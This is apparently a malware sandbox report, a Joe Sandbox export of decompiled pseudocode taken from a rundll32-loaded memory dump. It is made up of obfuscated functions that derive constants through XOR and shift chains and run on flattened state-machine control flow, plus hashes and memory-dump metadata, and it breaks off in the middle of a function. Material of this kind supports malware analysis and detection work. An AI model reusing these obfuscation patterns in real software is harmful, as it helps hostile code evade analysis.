                                                                                                                                  										if(_t178 > 0x5a) {
                                                                                                                                  											goto L14;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t178 - 0x7a;
                                                                                                                                  									if(_t178 > 0x7a) {
                                                                                                                                  										goto L12;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								__eflags = _t178 - 0x39;
                                                                                                                                  								if(_t178 > 0x39) {
                                                                                                                                  									goto L10;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							_t189 = _t189 + 1;
                                                                                                                                  							__eflags =  *_t189;
                                                                                                                                  						}
                                                                                                                                  						_t183 = 0x4a2a3c4;
                                                                                                                                  						continue;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t183 == 0x7562914) {
                                                                                                                                  							_v144 = 0x80;
                                                                                                                                  							_t178 = E002DCD29(_v164,  &_v144, _v176,  &_v128);
                                                                                                                                  							_t220 =  &(_t220[3]);
                                                                                                                                  							_t183 = 0x640e5f9;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t183 == 0xf669bfa) {
                                                                                                                                  								_t183 = 0x7562914;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L18:
                                                                                                                                  					__eflags = _t183 - 0x1718ff4;
                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					return _t178;
                                                                                                                                  				}
                                                                                                                                  				_push(_v172);
                                                                                                                                  				_push(_v156);
                                                                                                                                  				_push(_v204);
                                                                                                                                  				_t174 = E002E8606(_v148, 0x2d1690, __eflags);
                                                                                                                                  				E002D2206( &_v128, _t209, _v196, _v200, _t174, E002DEE81(__eflags), _v184);
                                                                                                                                  				_t178 = E002DA8B0(_v160, _t174, _v152);
                                                                                                                                  				_t220 =  &(_t220[0xb]);
                                                                                                                                  				_t183 = 0x1718ff4;
                                                                                                                                  				goto L18;
                                                                                                                                  			}


                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: *&B$eP)s$iFG${So
                                                                                                                                  • API String ID: 0-2946410069
                                                                                                                                  • Opcode ID: f3cabd2863ca70439f8a80faa1f6488681b1ae0f19c224d01351e85e45873f8e
                                                                                                                                  • Instruction ID: 33fab4652050435248e18d6d3bf9ebce28584b775e31a080f7363d2afaa4f1a5
                                                                                                                                  • Opcode Fuzzy Hash: f3cabd2863ca70439f8a80faa1f6488681b1ae0f19c224d01351e85e45873f8e
                                                                                                                                  • Instruction Fuzzy Hash: A281B7715193819BD368CF26D588A1BBBF2BBC5B18F40991DF5C586260D3B8C98ACF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D4EE3(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				intOrPtr _v88;
                                                                                                                                  				char _v608;
                                                                                                                                  				void* _t203;
                                                                                                                                  				void* _t204;
                                                                                                                                  				void* _t207;
                                                                                                                                  				signed int _t212;
                                                                                                                                  				signed int _t213;
                                                                                                                                  				signed int _t214;
                                                                                                                                  				signed int _t215;
                                                                                                                                  				intOrPtr _t216;
                                                                                                                                  				void* _t221;
                                                                                                                                  
                                                                                                                                  				_v84 = _v84 & 0x00000000;
                                                                                                                                  				_v88 = 0xf9097a;
                                                                                                                                  				_v32 = 0xbcbe1d;
                                                                                                                                  				_v32 = _v32 << 9;
                                                                                                                                  				_v32 = _v32 << 9;
                                                                                                                                  				_v32 = _v32 << 0xb;
                                                                                                                                  				_v32 = _v32 ^ 0xa0062323;
                                                                                                                                  				_v16 = 0x782140;
                                                                                                                                  				_v16 = _v16 + 0xfffffe34;
                                                                                                                                  				_v16 = _v16 + 0xfffffe18;
                                                                                                                                  				_v16 = _v16 << 0xa;
                                                                                                                                  				_v16 = _v16 ^ 0xe0701d9a;
                                                                                                                                  				_v40 = 0x7af846;
                                                                                                                                  				_v40 = _v40 + 0xffff28b3;
                                                                                                                                  				_v40 = _v40 << 0xd;
                                                                                                                                  				_v40 = _v40 + 0xffffd351;
                                                                                                                                  				_v40 = _v40 ^ 0x441384bc;
                                                                                                                                  				_v68 = 0xebfd4;
                                                                                                                                  				_v68 = _v68 + 0xffff2b98;
                                                                                                                                  				_t212 = 0x4b;
                                                                                                                                  				_v68 = _v68 / _t212;
                                                                                                                                  				_v68 = _v68 ^ 0x000f3184;
                                                                                                                                  				_v48 = 0x77c678;
                                                                                                                                  				_t213 = 0x72;
                                                                                                                                  				_v48 = _v48 * 0x4d;
                                                                                                                                  				_v48 = _v48 + 0x6b8c;
                                                                                                                                  				_v48 = _v48 ^ 0x240efbe4;
                                                                                                                                  				_v24 = 0xae1064;
                                                                                                                                  				_v24 = _v24 / _t213;
                                                                                                                                  				_v24 = _v24 << 7;
                                                                                                                                  				_v24 = _v24 ^ 0x1be7fa9d;
                                                                                                                                  				_v24 = _v24 ^ 0x1b226397;
                                                                                                                                  				_v72 = 0x44bde7;
                                                                                                                                  				_v72 = _v72 | 0x5f63ee23;
                                                                                                                                  				_v72 = _v72 ^ 0x5f6de837;
                                                                                                                                  				_v56 = 0x5a94a4;
                                                                                                                                  				_v56 = _v56 >> 9;
                                                                                                                                  				_t214 = 0xc;
                                                                                                                                  				_v56 = _v56 * 0x2a;
                                                                                                                                  				_v56 = _v56 ^ 0x0003dc1b;
                                                                                                                                  				_v8 = 0x2a4d30;
                                                                                                                                  				_v8 = _v8 + 0xff2b;
                                                                                                                                  				_v8 = _v8 | 0x9a82811b;
                                                                                                                                  				_v8 = _v8 << 0xc;
                                                                                                                                  				_v8 = _v8 ^ 0xbcdbc31f;
                                                                                                                                  				_v64 = 0xa41a91;
                                                                                                                                  				_v64 = _v64 | 0x62aa1889;
                                                                                                                                  				_v64 = _v64 << 0xd;
                                                                                                                                  				_v64 = _v64 ^ 0xc357e7aa;
                                                                                                                                  				_v36 = 0x90fe9;
                                                                                                                                  				_v36 = _v36 >> 0xa;
                                                                                                                                  				_v36 = _v36 | 0x57d87c49;
                                                                                                                                  				_v36 = _v36 / _t214;
                                                                                                                                  				_v36 = _v36 ^ 0x0755636a;
                                                                                                                                  				_v28 = 0x5fda7e;
                                                                                                                                  				_v28 = _v28 + 0xffff2d0f;
                                                                                                                                  				_v28 = _v28 << 0xa;
                                                                                                                                  				_v28 = _v28 + 0xdffb;
                                                                                                                                  				_v28 = _v28 ^ 0x7c1a8a5e;
                                                                                                                                  				_v20 = 0xaf632f;
                                                                                                                                  				_v20 = _v20 >> 8;
                                                                                                                                  				_v20 = _v20 << 9;
                                                                                                                                  				_v20 = _v20 >> 0xf;
                                                                                                                                  				_v20 = _v20 ^ 0x0003fa93;
                                                                                                                                  				_v12 = 0x960758;
                                                                                                                                  				_v12 = _v12 ^ 0x64ee01f0;
                                                                                                                                  				_v12 = _v12 | 0x3d3dd2ba;
                                                                                                                                  				_v12 = _v12 << 7;
                                                                                                                                  				_v12 = _v12 ^ 0xbeed48c5;
                                                                                                                                  				_v80 = 0xba0fdf;
                                                                                                                                  				_v80 = _v80 + 0xfd2d;
                                                                                                                                  				_v80 = _v80 ^ 0x00b93168;
                                                                                                                                  				_v60 = 0x5f834c;
                                                                                                                                  				_v60 = _v60 ^ 0x963b7b6a;
                                                                                                                                  				_t215 = 0x3f;
                                                                                                                                  				_v60 = _v60 * 0x3e;
                                                                                                                                  				_v60 = _v60 ^ 0x6c73d449;
                                                                                                                                  				_v76 = 0x4b89c6;
                                                                                                                                  				_v76 = _v76 >> 6;
                                                                                                                                  				_v76 = _v76 ^ 0x0008f57a;
                                                                                                                                  				_v52 = 0x3d488e;
                                                                                                                                  				_v52 = _v52 << 6;
                                                                                                                                  				_v52 = _v52 << 8;
                                                                                                                                  				_v52 = _v52 ^ 0x5226582a;
                                                                                                                                  				_v44 = 0x8cf369;
                                                                                                                                  				_v44 = _v44 ^ 0x25329c0c;
                                                                                                                                  				_v44 = _v44 / _t215;
                                                                                                                                  				_v44 = _v44 >> 0xe;
                                                                                                                                  				_v44 = _v44 ^ 0x0005c7da;
                                                                                                                                  				_t216 =  *0x2f3e10; // 0x0
                                                                                                                                  				_t203 = E002DB6CF(_t216 + 0x1c, _v32, _v16, _v40);
                                                                                                                                  				_t241 = _a4 + 0x2c;
                                                                                                                                  				_t204 = E002DB23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
                                                                                                                                  				_t248 = _t204;
                                                                                                                                  				if(_t204 != 0) {
                                                                                                                                  					_push(_v64);
                                                                                                                                  					_push(_v8);
                                                                                                                                  					_t207 = E002EDCF7(_v56, 0x2d1000, _t248);
                                                                                                                                  					_pop(_t221);
                                                                                                                                  					E002D47CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
                                                                                                                                  					E002DA8B0(_v60, _t207, _v76);
                                                                                                                                  					E002E1F8A(_v52, _v44,  &_v608);
                                                                                                                                  				}
                                                                                                                                  				return 1;
                                                                                                                                  			}

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID: *X&R$0M*$7m_$@!x
                                                                                                                                  • API String ID: 1586166983-4050865940
                                                                                                                                  • Opcode ID: 6e887f9f26dc3f8987acc30aab4f1432d4b6396efcdceca97941f9fc4a5925dc
                                                                                                                                  • Instruction ID: a228040eb7966d8201293cf8ec91d5d1fffac1677edeb6202818fd94209e8b1c
                                                                                                                                  • Opcode Fuzzy Hash: 6e887f9f26dc3f8987acc30aab4f1432d4b6396efcdceca97941f9fc4a5925dc
                                                                                                                                  • Instruction Fuzzy Hash: 1E810272C0121DEBCF49DFA1D88A8EEBBB1FF44718F208119E411B6260D7B55A5ACF94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002DEA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				void* _t136;
                                                                                                                                  				signed int _t147;
                                                                                                                                  				void* _t150;
                                                                                                                                  				intOrPtr* _t152;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t165;
                                                                                                                                  				signed int _t166;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				signed int* _t171;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t152 = __edx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t136);
                                                                                                                                  				_v52 = 0x4b44d9;
                                                                                                                                  				_t171 =  &(( &_v68)[6]);
                                                                                                                                  				_t165 = 0;
                                                                                                                                  				_t154 = 0x40ad1f2;
                                                                                                                                  				_t166 = 0x41;
                                                                                                                                  				_v52 = _v52 * 0x5c;
                                                                                                                                  				_v52 = _v52 ^ 0xd486af61;
                                                                                                                                  				_v52 = _v52 ^ 0xcf8a129f;
                                                                                                                                  				_v24 = 0x8b17cc;
                                                                                                                                  				_v24 = _v24 + 0xffff02b5;
                                                                                                                                  				_v24 = _v24 ^ 0x008a1a91;
                                                                                                                                  				_v64 = 0xcc4e1;
                                                                                                                                  				_v64 = _v64 ^ 0x71537a57;
                                                                                                                                  				_v64 = _v64 | 0xbc84d226;
                                                                                                                                  				_v64 = _v64 + 0x8a58;
                                                                                                                                  				_v64 = _v64 ^ 0xbde0890e;
                                                                                                                                  				_v12 = 0x10173e;
                                                                                                                                  				_v12 = _v12 / _t166;
                                                                                                                                  				_v12 = _v12 ^ 0x000bb2e7;
                                                                                                                                  				_v16 = 0xcbf18d;
                                                                                                                                  				_v16 = _v16 + 0x7f8c;
                                                                                                                                  				_v16 = _v16 ^ 0x00cd0dea;
                                                                                                                                  				_v20 = 0x7a67ce;
                                                                                                                                  				_v20 = _v20 << 1;
                                                                                                                                  				_v20 = _v20 ^ 0x00fa626e;
                                                                                                                                  				_v68 = 0x7779f8;
                                                                                                                                  				_v68 = _v68 + 0xa85e;
                                                                                                                                  				_v68 = _v68 << 0x10;
                                                                                                                                  				_v68 = _v68 >> 3;
                                                                                                                                  				_v68 = _v68 ^ 0x0443aeb4;
                                                                                                                                  				_v28 = 0xee6391;
                                                                                                                                  				_v28 = _v28 ^ 0x2bfa2339;
                                                                                                                                  				_v28 = _v28 ^ 0x2b1bacd2;
                                                                                                                                  				_v32 = 0x87b642;
                                                                                                                                  				_v32 = _v32 + 0xffff3baa;
                                                                                                                                  				_v32 = _v32 ^ 0x008fda80;
                                                                                                                                  				_v36 = 0x3b697f;
                                                                                                                                  				_v36 = _v36 | 0x5675f49c;
                                                                                                                                  				_v36 = _v36 ^ 0x5679bffa;
                                                                                                                                  				_v40 = 0x254a84;
                                                                                                                                  				_v40 = _v40 * 0x67;
                                                                                                                                  				_v40 = _v40 ^ 0x0f0bd396;
                                                                                                                                  				_v44 = 0xfc206d;
                                                                                                                                  				_v44 = _v44 * 0x45;
                                                                                                                                  				_v44 = _v44 ^ 0x43f6aa11;
                                                                                                                                  				_v56 = 0x3dd941;
                                                                                                                                  				_v56 = _v56 ^ 0x94d2d45c;
                                                                                                                                  				_v56 = _v56 >> 9;
                                                                                                                                  				_v56 = _v56 ^ 0x00419011;
                                                                                                                                  				_v4 = 0xdcf5c3;
                                                                                                                                  				_v4 = _v4 ^ 0x0d464ae6;
                                                                                                                                  				_v4 = _v4 ^ 0x0d938ce3;
                                                                                                                                  				_v60 = 0xe23f0;
                                                                                                                                  				_v60 = _v60 ^ 0x0435e191;
                                                                                                                                  				_v60 = _v60 ^ 0xbde67646;
                                                                                                                                  				_v60 = _v60 ^ 0xb922f804;
                                                                                                                                  				_v60 = _v60 ^ 0x00f2260b;
                                                                                                                                  				_v8 = 0x523a90;
                                                                                                                                  				_v8 = _v8 * 0x75;
                                                                                                                                  				_v8 = _v8 ^ 0x259e6962;
                                                                                                                                  				_v48 = 0x46565e;
                                                                                                                                  				_t167 = 3;
                                                                                                                                  				_v48 = _v48 * 0x6a;
                                                                                                                                  				_t168 = _v4;
                                                                                                                                  				_v48 = _v48 / _t167;
                                                                                                                                  				_v48 = _v48 ^ 0x09b4f31e;
                                                                                                                                  				do {
                                                                                                                                  					while(_t154 != 0x40ad1f2) {
                                                                                                                                  						if(_t154 == 0x458d12f) {
                                                                                                                                  							_t147 = E002D8F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
                                                                                                                                  							_t168 = _t147;
                                                                                                                                  							_t171 =  &(_t171[0xa]);
                                                                                                                                  							if(_t147 != 0xffffffff) {
                                                                                                                                  								_t154 = 0x4af2a99;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t154 == 0x4af2a99) {
                                                                                                                                  								_t150 = E002D19B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
                                                                                                                                  								_t171 =  &(_t171[8]);
                                                                                                                                  								_t165 = _t150;
                                                                                                                                  								_t154 = 0xe5b5021;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t154 != 0xe5b5021) {
                                                                                                                                  									goto L11;
                                                                                                                                  								} else {
                                                                                                                                  									E002E1E67(_v4, _v60, _v8, _v48, _t168);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L6:
                                                                                                                                  						return _t165;
                                                                                                                                  					}
                                                                                                                                  					_t154 = 0x458d12f;
                                                                                                                                  					L11:
                                                                                                                                  				} while (_t154 != 0xd2f352d);
                                                                                                                                  				goto L6;
                                                                                                                                  			}





























                                                                                                                                  0x002dec50
                                                                                                                                  0x002dec58
                                                                                                                                  0x002dec60
                                                                                                                                  0x002dec68
                                                                                                                                  0x002dec75
                                                                                                                                  0x002dec79
                                                                                                                                  0x002dec81
                                                                                                                                  0x002dec92
                                                                                                                                  0x002dec98
                                                                                                                                  0x002deca2
                                                                                                                                  0x002deca6
                                                                                                                                  0x002decaa
                                                                                                                                  0x002decb2
                                                                                                                                  0x002decb2
                                                                                                                                  0x002decc0
                                                                                                                                  0x002ded52
                                                                                                                                  0x002ded57
                                                                                                                                  0x002ded59
                                                                                                                                  0x002ded5f
                                                                                                                                  0x002ded61
                                                                                                                                  0x00000000
                                                                                                                                  0x002ded61
                                                                                                                                  0x002decc2
                                                                                                                                  0x002decc8
                                                                                                                                  0x002ded16
                                                                                                                                  0x002ded1b
                                                                                                                                  0x002ded1e
                                                                                                                                  0x002ded20
                                                                                                                                  0x00000000
                                                                                                                                  0x002decca
                                                                                                                                  0x002decd0
                                                                                                                                  0x00000000
                                                                                                                                  0x002decd6
                                                                                                                                  0x002dece7
                                                                                                                                  0x002decec
                                                                                                                                  0x002decd0
                                                                                                                                  0x002decc8
                                                                                                                                  0x002decef
                                                                                                                                  0x002decf8
                                                                                                                                  0x002decf8
                                                                                                                                  0x002ded6b
                                                                                                                                  0x002ded6d
                                                                                                                                  0x002ded6d
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -5/$WzSq$^VF$JF
                                                                                                                                  • API String ID: 0-2399144359
                                                                                                                                  • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                  • Instruction ID: 5165920699abf8d61a7732a0d098cf965de53971e8fe174dff331e9655865f62
                                                                                                                                  • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                  • Instruction Fuzzy Hash: A67122710183419BCB58DF65C98681BBBF2FBC8758F504A1EF69696220C3B1DA58DF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002E9BCF() {
                                                                                                                                  				char _v520;
                                                                                                                                  				signed int _v524;
                                                                                                                                  				signed int _v528;
                                                                                                                                  				signed int _v532;
                                                                                                                                  				signed int _v536;
                                                                                                                                  				unsigned int _v540;
                                                                                                                                  				signed int _v544;
                                                                                                                                  				signed int _v548;
                                                                                                                                  				signed int _v552;
                                                                                                                                  				signed int _v556;
                                                                                                                                  				signed int _v560;
                                                                                                                                  				signed int _v564;
                                                                                                                                  				signed int _v568;
                                                                                                                                  				signed int _t111;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				signed int _t117;
                                                                                                                                  				void* _t118;
                                                                                                                                  				signed int _t132;
                                                                                                                                  				void* _t134;
                                                                                                                                  				signed int _t135;
                                                                                                                                  				signed int* _t136;
                                                                                                                                  
                                                                                                                                  				_t136 =  &_v568;
                                                                                                                                  				_v560 = 0x297e3c;
                                                                                                                                  				_v560 = _v560 >> 9;
                                                                                                                                  				_t118 = 0x4ead2fe;
                                                                                                                                  				_v560 = _v560 + 0xe8be;
                                                                                                                                  				_v560 = _v560 ^ 0xc9c09221;
                                                                                                                                  				_v560 = _v560 ^ 0xc9c20db8;
                                                                                                                                  				_v540 = 0x190e1d;
                                                                                                                                  				_v540 = _v540 >> 7;
                                                                                                                                  				_v540 = _v540 >> 0xd;
                                                                                                                                  				_v540 = _v540 ^ 0x000cdd3b;
                                                                                                                                  				_v544 = 0x86c2f0;
                                                                                                                                  				_v544 = _v544 | 0x0d7eac20;
                                                                                                                                  				_v544 = _v544 ^ 0xe6b61282;
                                                                                                                                  				_v544 = _v544 ^ 0xeb41e563;
                                                                                                                                  				_v552 = 0x262f60;
                                                                                                                                  				_v552 = _v552 ^ 0x76c91adc;
                                                                                                                                  				_v552 = _v552 + 0xd1c5;
                                                                                                                                  				_v552 = _v552 ^ 0x76fc323e;
                                                                                                                                  				_v524 = 0xf427e0;
                                                                                                                                  				_v524 = _v524 + 0xffff22a3;
                                                                                                                                  				_v524 = _v524 ^ 0x00f85f52;
                                                                                                                                  				_v548 = 0xdbc1a5;
                                                                                                                                  				_v548 = _v548 >> 0xb;
                                                                                                                                  				_v548 = _v548 + 0xf615;
                                                                                                                                  				_v548 = _v548 ^ 0x0006ff3e;
                                                                                                                                  				_v556 = 0xd2f840;
                                                                                                                                  				_v556 = _v556 * 0x5f;
                                                                                                                                  				_t134 = 0;
                                                                                                                                  				_v556 = _v556 ^ 0x4e4cccaa;
                                                                                                                                  				_v568 = 0x74ecfa;
                                                                                                                                  				_t132 = 0x53;
                                                                                                                                  				_t133 = _v556;
                                                                                                                                  				_v568 = _v568 / _t132;
                                                                                                                                  				_v568 = _v568 ^ 0xc72664ff;
                                                                                                                                  				_v568 = _v568 << 0xf;
                                                                                                                                  				_v568 = _v568 ^ 0x862d9f40;
                                                                                                                                  				_v536 = 0xc0d44a;
                                                                                                                                  				_v536 = _v536 + 0x396d;
                                                                                                                                  				_t135 = _v556;
                                                                                                                                  				_t117 = _v556;
                                                                                                                                  				_v536 = _v536 * 0x46;
                                                                                                                                  				_v536 = _v536 ^ 0x34c6c601;
                                                                                                                                  				_v532 = 0xf37e83;
                                                                                                                                  				_v532 = _v532 << 8;
                                                                                                                                  				_v532 = _v532 | 0x760e0a19;
                                                                                                                                  				_v532 = _v532 ^ 0xf77c332a;
                                                                                                                                  				_v528 = 0x91f8e3;
                                                                                                                                  				_v528 = _v528 ^ 0xc904aca2;
                                                                                                                                  				_v528 = _v528 ^ 0xc9900919;
                                                                                                                                  				do {
                                                                                                                                  					while(_t118 != 0x27fe330) {
                                                                                                                                  						if(_t118 == 0x4ead2fe) {
                                                                                                                                  							_t118 = 0x96d401d;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t118 == 0x7ac597b) {
                                                                                                                                  								_t117 = E002DB6CF( &_v520, _v548, _v556, _v568);
                                                                                                                                  								_t118 = 0xa7595e6;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t118 == 0x80b0e4e) {
                                                                                                                                  									_t90 =  &_v552; // 0xeb41e563
                                                                                                                                  									_t111 = E002D9B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
                                                                                                                                  									_t136 =  &(_t136[4]);
                                                                                                                                  									__eflags = _t111;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										_t118 = 0x7ac597b;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									if(_t118 == 0x96d401d) {
                                                                                                                                  										_t115 = E002D52C2();
                                                                                                                                  										_t133 = _t115;
                                                                                                                                  										__eflags = _t115;
                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                  											_t118 = 0x80b0e4e;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										if(_t118 != 0xa7595e6) {
                                                                                                                                  											goto L15;
                                                                                                                                  										} else {
                                                                                                                                  											_t135 = E002D2051(_v532, _t117, _v528);
                                                                                                                                  											_t118 = 0x27fe330;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  					_v564 = 0x69bdc3;
                                                                                                                                  					_v564 = _v564 | 0xfd1bce6c;
                                                                                                                                  					_v564 = _v564 ^ 0xf153ffb6;
                                                                                                                                  					_v564 = _v564 ^ 0x260f00bb;
                                                                                                                                  					__eflags = _t135 - _v564;
                                                                                                                                  					_t134 =  ==  ? 1 : _t134;
                                                                                                                                  					_t118 = 0x8b668cc;
                                                                                                                                  					L15:
                                                                                                                                  					__eflags = _t118 - 0x8b668cc;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				L16:
                                                                                                                                  				return _t134;
                                                                                                                                  			}

























                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <~)$`/&$cA$m9
                                                                                                                                  • API String ID: 0-2671356241
                                                                                                                                  • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                  • Instruction ID: 260d84ef838b759f5b81999b37c3d5328a31483948e7c171b3649e848feb0016
                                                                                                                                  • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                  • Instruction Fuzzy Hash: BD5175710183429FC398CE22D49542BBBE1FFD8758F901D1EF5A692260C3B4CA998F82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E002D9B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				unsigned int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				char _v52;
                                                                                                                                  				void* _v64;
                                                                                                                                  				intOrPtr _v68;
                                                                                                                                  				void* _t115;
                                                                                                                                  				signed int _t130;
                                                                                                                                  				signed int _t131;
                                                                                                                                  				void* _t133;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_v52 = 0x104;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(0x104);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(0x104);
                                                                                                                                  				_v68 = 0x342964;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_t133 = 0;
                                                                                                                                  				asm("stosd");
